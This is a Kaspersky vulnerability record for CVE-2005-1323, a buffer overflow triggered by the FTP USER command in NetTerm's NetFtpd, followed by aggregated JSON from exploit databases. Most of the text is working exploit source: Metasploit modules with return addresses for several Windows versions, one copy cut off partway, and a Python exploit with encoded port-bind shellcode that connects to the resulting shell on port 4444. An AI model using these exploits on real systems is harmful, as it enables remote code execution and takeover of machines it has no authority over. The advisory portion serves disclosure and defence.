ID KLA10272
Type kaspersky
Reporter Kaspersky Lab
Modified 2020-05-22T00:00:00
Description
Detect date :
05/02/2005 (2005-05-02)
Severity :
Critical
Description :
A buffer overflow was found in NetTerm. By exploiting this vulnerability, malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially crafted command sent to the bundled NetFtpd FTP service (see the CVE entry below).
Affected products :
Intersoft Netterm
Solution :
Update to the latest version (NetTerm 5.1.1 and earlier are affected, per the CVE entry below)
Impacts :
ACE (arbitrary code execution)
Related products :
NetTerm
CVE-IDS :
CVE-2005-1323 (CVSS 7.5, Critical)
{"id": "KLA10272", "bulletinFamily": "info", "title": "\r KLA10272ACE vulnerability in NetTerm ", "description": "### *Detect date*:\n05/02/2005\n\n### *Severity*:\nCritical\n\n### *Description*:\nA buffer overflow was found in NetTerm. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited remotely via a specially designed command.\n\n### *Affected products*:\nIntersoft Netterm\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[NetTerm](<https://threats.kaspersky.com/en/product/NetTerm/>)\n\n### *CVE-IDS*:\n[CVE-2005-1323](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1323>)7.5Critical", "published": "2005-05-02T00:00:00", "modified": "2020-05-22T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10272", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2005-1323"], "type": "kaspersky", "lastseen": "2020-09-02T11:56:07", "edition": 41, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1323"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/NETTERM_NETFTPD_USER"]}, {"type": "exploitdb", "idList": ["EDB-ID:16735", "EDB-ID:955"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83000"]}, {"type": "osvdb", "idList": ["OSVDB:15865"]}, {"type": "nessus", "idList": ["NETFTPD.NASL"]}], "modified": "2020-09-02T11:56:07", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-09-02T11:56:07", "rev": 2}, "vulnersScore": 6.4}, "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:34:54", "description": "Buffer overflow in NetFtpd for NetTerm 5.1.1 and earlier allows remote attackers to execute arbitrary code via a long USER command.", "edition": 3, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-1323", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1323"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:intersoft:netterm:4.2.2"], "id": "CVE-2005-1323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1323", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:intersoft:netterm:4.2.2:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:20:31", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "NetTerm NetFTPD USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1323"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83000", "href": "https://packetstormsecurity.com/files/83000/NetTerm-NetFTPD-USER-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Ftp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'NetTerm NetFTPD USER Buffer Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability in the NetTerm NetFTPD \napplication. This package is part of the NetTerm package. \nThis module uses the USER command to trigger the overflow. \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-1323'], \n[ 'OSVDB', '15865'], \n[ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'], \n[ 'BID', '13396'], \n \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\\x0a\\x20\\x0d\", \n'StackAdjustment' => -3500, \n \n}, \n \n'Targets' => \n[ \n[ \n'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005 \n{ \n'Platform' => 'win', \n'Ret' => 0x0040df98, # netftpd.exe (multiple versions) \n}, \n], \n[ \n'Windows 2000 English', \n{ \n'Platform' => 'win', \n'Ret' => 0x75022ac4, # ws2help.dll \n}, \n], \n[ \n'Windows XP English SP0/SP1', \n{ \n'Platform' => 'win', \n'Ret' => 0x71aa32ad, # ws2help.dll \n}, \n], \n[ \n'Windows 2003 English', \n{ \n'Platform' => 'win', \n'Ret' => 0x7ffc0638, # peb magic :-) \n}, \n], \n[ \n'Windows NT 4.0 SP4/SP5/SP6', \n{ \n'Platform' => 'win', \n'Ret' => 0x77681799, # ws2help.dll \n}, \n], \n], \n'DisclosureDate' => 'Apr 26 2005', \n'DefaultTarget' => 0)) \nend \n \ndef check \nconnect \ndisconnect \nif (banner =~ /NetTerm FTP server/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nprint_status(\"Trying target #{target.name}...\") \n \n# U push ebp \n# S push ebx \n# E inc ebp \n# R push edx \n# \\x20\\xC0 and al, al \n \nbuf = rand_text_english(8192, payload_badchars) \nbuf[0, 1] = \"\\xc0\" \nbuf[1, 
payload.encoded.length] = payload.encoded \nbuf[1014, 4] = [ target.ret ].pack('V') \n \nsend_cmd( [\"USER #{buf}\"] ) \nsend_cmd( ['HELP'] ) \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83000/netterm_netftpd_user.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:11", "bulletinFamily": "software", "cvelist": ["CVE-2005-1323"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in NetTerm NetFtpd. NetFtpd fails to handle overly long input to the USER command resulting in a buffer overflow. With a specially crafted request, a remote attacker can execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue. According to the vendor, NetFtpd has been removed from NetTerm.\n## Short Description\nA remote overflow exists in NetTerm NetFtpd. NetFtpd fails to handle overly long input to the USER command resulting in a buffer overflow. 
With a specially crafted request, a remote attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://netterm.com/html/netterm.html\n[Secunia Advisory ID:15140](https://secuniaresearch.flexerasoftware.com/advisories/15140/)\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0573.html\nISS X-Force ID: 20285\nGeneric Exploit URL: http://metasploit.com/projects/Framework/modules/exploits/netterm_netftpd_user_overflow.pm\n[CVE-2005-1323](https://vulners.com/cve/CVE-2005-1323)\nBugtraq ID: 13396\n", "modified": "2005-04-26T08:06:16", "published": "2005-04-26T08:06:16", "href": "https://vulners.com/osvdb/OSVDB:15865", "id": "OSVDB:15865", "title": "NetTerm NetFtpd USER Command Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:16:00", "description": "NetFTPd 4.2.2 User Authentication Remote Buffer Overflow Exploit. CVE-2005-1323. 
Remote exploit for windows platform", "published": "2005-04-26T00:00:00", "type": "exploitdb", "title": "NetFTPd 4.2.2 - User Authentication Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1323"], "modified": "2005-04-26T00:00:00", "id": "EDB-ID:955", "href": "https://www.exploit-db.com/exploits/955/", "sourceData": "#\r\n# Net-ftpd 4.2.2 user autentication b0f exploit (0day)\r\n# coded by Sergio 'shadown' Alvarez\r\n#\r\n\r\nimport struct\r\nimport socket\r\nimport sys\r\nimport time\r\n\r\nclass warftpd:\r\n\tdef __init__(self, host, port):\r\n\t\tself.host\t\t= host\r\n\t\tself.port\t\t= port\r\n\t\tself.bsize\t\t= 512\r\n\t\tself.ebpaddr\t= 0xcacacaca\r\n\t\tself.retaddr\t= 0xdeadbeef\r\n\t\tself.sctype\t\t= 'findskt'\r\n\t\tself.scport\t\t= None\r\n\r\n\tdef setebpaddr(self, addr):\r\n\t\tself.ebpaddr = addr\r\n\r\n\tdef setretaddr(self, addr):\r\n\t\tself.retaddr = addr\r\n\r\n\tdef setbsize(self, size):\r\n\t\tself.bsize = size\r\n\r\n\tdef setsctype(self, type):\r\n\t\tself.sctype = type\r\n\r\n\tdef setscport(self, port):\r\n\t\tself.scport = port\r\n\r\n\tdef genbuffer(self):\r\n\t\t## \r\n\t\t# Alpha port bind 4444, thanx metasploit\r\n\t\t## \r\n\t\tsc = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"\r\n\t\tsc += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x51\\x5a\\x6a\\x46\"\r\n\t\tsc += \"\\x58\\x30\\x41\\x31\\x50\\x42\\x41\\x6b\\x42\\x41\\x56\\x42\\x32\\x42\\x41\\x32\"\r\n\t\tsc += \"\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x6b\\x4c\\x70\"\r\n\t\tsc += \"\\x6a\\x78\\x6b\\x70\\x4f\\x6d\\x38\\x59\\x69\\x49\\x6f\\x69\\x6f\\x6b\\x4f\\x61\"\r\n\t\tsc += \"\\x70\\x4c\\x4b\\x70\\x6c\\x35\\x74\\x66\\x44\\x6c\\x4b\\x73\\x75\\x45\\x6c\\x4c\"\r\n\t\tsc += \"\\x4b\\x31\\x6c\\x55\\x55\\x62\\x58\\x54\\x41\\x38\\x6f\\x6e\\x6b\\x50\\x4f\\x57\"\r\n\t\tsc += 
\"\\x68\\x4c\\x4b\\x33\\x6f\\x65\\x70\\x56\\x61\\x38\\x6b\\x69\\x73\\x50\\x30\\x37\"\r\n\t\tsc += \"\\x39\\x6c\\x4b\\x50\\x34\\x4e\\x6b\\x77\\x71\\x58\\x6e\\x34\\x71\\x4b\\x70\\x4a\"\r\n\t\tsc += \"\\x39\\x6e\\x4c\\x6b\\x34\\x4f\\x30\\x64\\x34\\x35\\x57\\x6b\\x71\\x6b\\x7a\\x56\"\r\n\t\tsc += \"\\x6d\\x53\\x31\\x78\\x42\\x7a\\x4b\\x69\\x64\\x35\\x6b\\x32\\x74\\x61\\x34\\x76\"\r\n\t\tsc += \"\\x48\\x44\\x35\\x4d\\x33\\x4c\\x4b\\x63\\x6f\\x56\\x44\\x37\\x71\\x5a\\x4b\\x50\"\r\n\t\tsc += \"\\x66\\x6e\\x6b\\x66\\x6c\\x32\\x6b\\x4c\\x4b\\x31\\x4f\\x45\\x4c\\x75\\x51\\x38\"\r\n\t\tsc += \"\\x6b\\x34\\x43\\x76\\x4c\\x4c\\x4b\\x6b\\x39\\x72\\x4c\\x45\\x74\\x47\\x6c\\x63\"\r\n\t\tsc += \"\\x51\\x7a\\x63\\x45\\x61\\x4f\\x30\\x53\\x54\\x4e\\x6b\\x67\\x30\\x30\\x30\\x4c\"\r\n\t\tsc += \"\\x4b\\x63\\x70\\x34\\x4c\\x4e\\x6b\\x34\\x30\\x37\\x6c\\x4e\\x4d\\x4e\\x6b\\x71\"\r\n\t\tsc += \"\\x50\\x55\\x58\\x61\\x4e\\x73\\x58\\x6e\\x6e\\x70\\x4e\\x64\\x4e\\x68\\x6c\\x70\"\r\n\t\tsc += \"\\x50\\x4b\\x4f\\x6b\\x66\\x30\\x31\\x49\\x4b\\x50\\x66\\x52\\x73\\x53\\x56\\x30\"\r\n\t\tsc += \"\\x68\\x74\\x73\\x57\\x42\\x43\\x58\\x61\\x67\\x61\\x63\\x75\\x62\\x63\\x6f\\x36\"\r\n\t\tsc += \"\\x34\\x49\\x6f\\x58\\x50\\x45\\x38\\x4a\\x6b\\x4a\\x4d\\x39\\x6c\\x57\\x4b\\x56\"\r\n\t\tsc += \"\\x30\\x69\\x6f\\x5a\\x76\\x43\\x6f\\x4d\\x59\\x78\\x65\\x35\\x36\\x4c\\x41\\x48\"\r\n\t\tsc += \"\\x6d\\x66\\x68\\x37\\x72\\x71\\x45\\x62\\x4a\\x64\\x42\\x6b\\x4f\\x38\\x50\\x35\"\r\n\t\tsc += \"\\x38\\x6e\\x39\\x64\\x49\\x7a\\x55\\x4c\\x6d\\x31\\x47\\x79\\x6f\\x6e\\x36\\x56\"\r\n\t\tsc += \"\\x33\\x62\\x73\\x72\\x73\\x30\\x53\\x71\\x43\\x77\\x33\\x30\\x53\\x67\\x33\\x36\"\r\n\t\tsc += \"\\x33\\x59\\x6f\\x7a\\x70\\x30\\x66\\x70\\x68\\x76\\x71\\x73\\x6c\\x41\\x76\\x72\"\r\n\t\tsc += \"\\x73\\x6f\\x79\\x7a\\x41\\x4c\\x55\\x32\\x48\\x4c\\x64\\x44\\x5a\\x74\\x30\\x4a\"\r\n\t\tsc += \"\\x67\\x56\\x37\\x49\\x6f\\x4a\\x76\\x51\\x7a\\x44\\x50\\x42\\x71\\x53\\x65\\x6b\"\r\n\t\tsc += 
\"\\x4f\\x38\\x50\\x30\\x68\\x6f\\x54\\x4e\\x4d\\x44\\x6e\\x79\\x79\\x30\\x57\\x79\"\r\n\t\tsc += \"\\x6f\\x68\\x56\\x41\\x43\\x30\\x55\\x4b\\x4f\\x4a\\x70\\x52\\x48\\x4d\\x35\\x67\"\r\n\t\tsc += \"\\x39\\x6f\\x76\\x30\\x49\\x33\\x67\\x6b\\x4f\\x4a\\x76\\x72\\x70\\x63\\x64\\x61\"\r\n\t\tsc += \"\\x44\\x30\\x55\\x49\\x6f\\x38\\x50\\x4c\\x53\\x65\\x38\\x4b\\x57\\x72\\x59\\x6a\"\r\n\t\tsc += \"\\x66\\x63\\x49\\x72\\x77\\x69\\x6f\\x78\\x56\\x41\\x45\\x4b\\x4f\\x6a\\x70\\x70\"\r\n\t\tsc += \"\\x66\\x70\\x6a\\x63\\x54\\x61\\x76\\x30\\x68\\x43\\x53\\x72\\x4d\\x6c\\x49\\x68\"\r\n\t\tsc += \"\\x65\\x53\\x5a\\x70\\x50\\x53\\x69\\x76\\x49\\x6a\\x6c\\x6f\\x79\\x4d\\x37\\x61\"\r\n\t\tsc += \"\\x7a\\x67\\x34\\x4e\\x69\\x59\\x72\\x37\\x41\\x6b\\x70\\x6a\\x53\\x4c\\x6a\\x59\"\r\n\t\tsc += \"\\x6e\\x53\\x72\\x56\\x4d\\x59\\x6e\\x33\\x72\\x64\\x6c\\x6c\\x53\\x4e\\x6d\\x42\"\r\n\t\tsc += \"\\x5a\\x35\\x68\\x4c\\x6b\\x6e\\x4b\\x4e\\x4b\\x72\\x48\\x44\\x32\\x6b\\x4e\\x4d\"\r\n\t\tsc += \"\\x63\\x54\\x56\\x79\\x6f\\x43\\x45\\x32\\x64\\x6b\\x4f\\x6b\\x66\\x33\\x6b\\x53\"\r\n\t\tsc += \"\\x67\\x30\\x52\\x63\\x61\\x66\\x31\\x52\\x71\\x53\\x5a\\x74\\x41\\x56\\x31\\x32\"\r\n\t\tsc += \"\\x71\\x73\\x65\\x50\\x51\\x4b\\x4f\\x5a\\x70\\x32\\x48\\x6c\\x6d\\x4a\\x79\\x47\"\r\n\t\tsc += \"\\x75\\x48\\x4e\\x62\\x73\\x6b\\x4f\\x7a\\x76\\x61\\x7a\\x6b\\x4f\\x6b\\x4f\\x35\"\r\n\t\tsc += \"\\x67\\x6b\\x4f\\x68\\x50\\x6e\\x6b\\x31\\x47\\x4b\\x4c\\x6d\\x53\\x68\\x44\\x41\"\r\n\t\tsc += \"\\x74\\x4b\\x4f\\x4e\\x36\\x36\\x32\\x49\\x6f\\x68\\x50\\x75\\x38\\x6c\\x30\\x4f\"\r\n\t\tsc += \"\\x7a\\x56\\x64\\x31\\x4f\\x43\\x63\\x59\\x6f\\x4a\\x76\\x4b\\x4f\\x38\\x50\\x46\"\r\n\t\t\r\n\t\t# 
shellcode\r\n\t\t#sc\t\t=\t\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66\"\r\n\t\t#sc\t\t+=\t\"\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6\"\r\n\t\t#sc\t\t+=\t\"\\x31\\x97\\xae\\xc4\\x7e\\x97\\x87\\xdc\\xed\\x48\\xc7\\x98\\x67\\xf6\\x49\\xaa\"\r\n\t\t#sc\t\t+=\t\"\\x7e\\x97\\x98\\xc0\\x67\\xf7\\x21\\xd2\\x2f\\x97\\xf6\\x6b\\x67\\xf2\\xf3\\x1f\"\r\n\t\t#sc\t\t+=\t\"\\x9a\\x2d\\x02\\x4c\\x5e\\xfc\\xb6\\xe7\\xa7\\xd3\\xcf\\xe1\\xa1\\xf7\\x30\\xdb\"\r\n\t\t#sc\t\t+=\t\"\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba\"\r\n\t\t#sc\t\t+=\t\"\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb\"\r\n\t\t#sc\t\t+=\t\"\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc\"\r\n\t\t#sc\t\t+=\t\"\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61\"\r\n\t\t#sc\t\t+=\t\"\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70\"\r\n\t\t#sc\t\t+=\t\"\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44\"\r\n\t\t#sc\t\t+=\t\"\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7\"\r\n\t\t#sc\t\t+=\t\"\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69\"\r\n\t\t#sc\t\t+=\t\"\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9\"\r\n\t\t#sc\t\t+=\t\"\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0\"\r\n\t\t#sc\t\t+=\t\"\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3\"\r\n\t\t#sc\t\t+=\t\"\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7\"\r\n\t\t#sc\t\t+=\t\"\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0\"\r\n\t\t#sc\t\t+=\t\"\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67\"\r\n\t\t#sc\t\t+=\t\"\\x9c\\x9f\\x2
e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1\"\r\n\t\t#sc\t\t+=\t\"\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0\"\r\n\t\t#sc\t\t+=\t\"\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88\"\r\n\t\t#sc\t\t+=\t\"\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d\"\r\n\t\t#sc\t\t+=\t\"\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95\"\r\n\t\t#sc\t\t+=\t\"\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2\"\r\n\t\t# other stuff\r\n\t\tnops\t=\t\"\\x41\"*(self.bsize-len(sc)-50)\r\n\t\tebp\t=\tstruct.pack('<L', self.ebpaddr)\r\n\t\t# check if the value is an integer, otherwise it should be a string\r\n\t\tif self.retaddr.__class__.__name__ == 'int':\r\n\t\t\tret\t=\tstruct.pack('<L', self.retaddr)\r\n\t\telse:\r\n\t\t\tret\t=\tself.retaddr\r\n\t\t# assemble buffer to send\r\n\t\tbuffer\t=\t\"USER \"\r\n\t\tbuffer\t+=\tnops\r\n\t\tbuffer\t+=\tsc\r\n\t\tbuffer\t+=\t'\\x42'*(50-4)\r\n\t\tbuffer\t+=\tebp\r\n\t\tbuffer\t+=\tret\r\n\t\treturn buffer\r\n\r\n\tdef exploit(self):\r\n\t\t# connect\r\n\t\tskt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\ttry:\r\n\t\t\tskt.connect((self.host, self.port))\r\n\t\texcept socket.error, err:\r\n\t\t\tprint \"[-] Error: %s\" % err[1]\r\n\t\t\treturn None\r\n\t\tprint \"[+] Connected to %s:%d\" % (self.host, self.port)\r\n\t\t# recv banner\r\n\t\tprint \"[+] Receiving Banner\"\r\n\t\tres = skt.recv(100)\r\n\t\tprint res\r\n\t\t# send payload\r\n\t\ttime.sleep(1)\r\n\t\tprint \"[+] Sending payload\"\r\n\t\tskt.send(self.genbuffer())\r\n\t\ttime.sleep(2) # test on mcafee anti-b0f\r\n\t\tskt.close()\r\n\t\t# if successfull connect to the shell\r\n\t\ttime.sleep(2)\r\n\t\tskt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\ttry:\r\n\t\t\tskt.connect((self.host, 4444))\r\n\t\texcept socket.error, err:\r\n\t\t\tprint \"[-] Error: %s\" % 
err[1]\r\n\t\t\tprint \"[-] Explotation failed\\n[-] Daemon should be dead...\"\r\n\t\t\treturn None\r\n\t\tprint \"[+] Connected to shell at %s on port %d\" % (self.host, 4444)\r\n\t\tres = skt.recv(1024)\r\n\t\tif res:\r\n\t\t\tif res.count('Microsoft Windows'):\r\n\t\t\t\tprint \"[+] Welcome my lord, i'm here to serve you ;) ...\\n\"\r\n\t\t\t\tfrom telnetlib import Telnet\r\n\t\t\t\ttelnet = Telnet()\r\n\t\t\t\ttelnet.sock = skt\r\n\t\t\t\ttry:\r\n\t\t\t\t\ttelnet.interact()\r\n\t\t\t\texcept:\r\n\t\t\t\t\tpass\r\n\t\t\t\tskt.close()\r\n\t\t\t\tprint \"[-] Bye..bye I hope you've enjoyed your stay.. ;)\"\r\n\t\t\t\treturn None\r\n\t\tskt.close()\r\n\t\tprint '[-] Explotation failed\\nDaemon should be dead...'\r\n\r\nif __name__ == '__main__':\r\n\tif len(sys.argv) != 3:\r\n\t\tprint \"*************************************\"\r\n\t\tprint \"* Coded by Sergio 'shadown' Alvarez *\"\r\n\t\tprint \"* shadown@gmail.com *\"\r\n\t\tprint \"*************************************\"\r\n\t\tprint \"Usage: %s host port\" % sys.argv[0]\r\n\t\tsys.exit(1)\r\n\r\n\texp = warftpd(sys.argv[1], int(sys.argv[2]))\r\n\texp.setsctype('findskt')\r\n\texp.setscport(1234)\r\n\texp.setbsize(1014)\r\n\texp.setebpaddr(0xdeadbeef) # sometimes needed, just in case\r\n\texp.setretaddr('\\x4c\\xfa\\x12\\x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)\r\n\texp.exploit()\r\n\r\n# milw0rm.com [2005-04-26]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/955/"}, {"lastseen": "2016-02-02T06:24:07", "description": "NetTerm NetFTPD USER Buffer Overflow. CVE-2005-1323. 
Remote exploit for windows platform", "published": "2010-10-05T00:00:00", "type": "exploitdb", "title": "NetTerm NetFTPD - USER Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1323"], "modified": "2010-10-05T00:00:00", "id": "EDB-ID:16735", "href": "https://www.exploit-db.com/exploits/16735/", "sourceData": "##\r\n# $Id: netterm_netftpd_user.rb 10559 2010-10-05 23:41:17Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'NetTerm NetFTPD USER Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the NetTerm NetFTPD\r\n\t\t\t\tapplication. 
This package is part of the NetTerm package.\r\n\t\t\t\tThis module uses the USER command to trigger the overflow.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10559 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-1323'],\r\n\t\t\t\t\t[ 'OSVDB', '15865'],\r\n\t\t\t\t\t[ 'URL', 'http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html'],\r\n\t\t\t\t\t[ 'BID', '13396'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x20\\x0d\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => [ 'win' ],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'NetTerm NetFTPD Universal', # Tested OK - hdm 11/24/2005\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x0040df98, # netftpd.exe (multiple versions)\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows 2000 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x75022ac4, # ws2help.dll\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows XP English SP0/SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x71aa32ad, # ws2help.dll\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows 2003 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x7ffc0638, # peb magic :-)\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows NT 4.0 SP4/SP5/SP6',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x77681799, # ws2help.dll\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 26 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\t\tif (banner =~ /NetTerm FTP server/)\r\n\t\t\treturn 